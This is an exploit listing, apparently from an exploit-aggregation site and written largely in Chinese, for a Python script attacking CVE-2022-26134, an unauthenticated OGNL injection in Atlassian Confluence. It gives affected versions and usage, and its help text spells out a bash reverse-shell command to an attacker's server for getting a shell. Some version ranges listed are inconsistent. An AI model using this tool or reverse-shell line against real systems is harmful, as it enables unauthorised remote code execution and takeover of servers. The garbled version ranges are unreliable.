Exploit for Expression Language Injection in Atlassian Confluence Data Center CVE-2022-26134

## https://sploitus.com/exploit?id=F0CF90CD-DC6E-5F0F-AD61-5E1694700F32
# CVE-2022-26134
远程攻击者在未经身份验证的情况下，可构造OGNL表达式进行注入，实现在Confluence Server或Data Center上执行任意代码,修改poc，方便getshell。常见端口:8090

## 影响版本
* Confluence Server and Data Center >= 1.3.0
* 7.14.0 <= Confluence Server and Data Center < 7.4.17
* 7.13.0 <= Confluence Server and Data Center < 7.13.7
* 7.14.0 <= Confluence Server and Data Center < 7.14.3
* 7.15.0 <= Confluence Server and Data Center < 7.15.2
* 7.16.0 <= Confluence Server and Data Center < 7.16.4
* 7.17.0 <= Confluence Server and Data Center < 7.17.4
* 7.18.0 <= Confluence Server and Data Center < 7.18.1

## 使用说明
```
pip3 install requests
```

```shell
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
```
## 使用
```shell
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令
```

此脚本仅可用于测试使用，勿作他用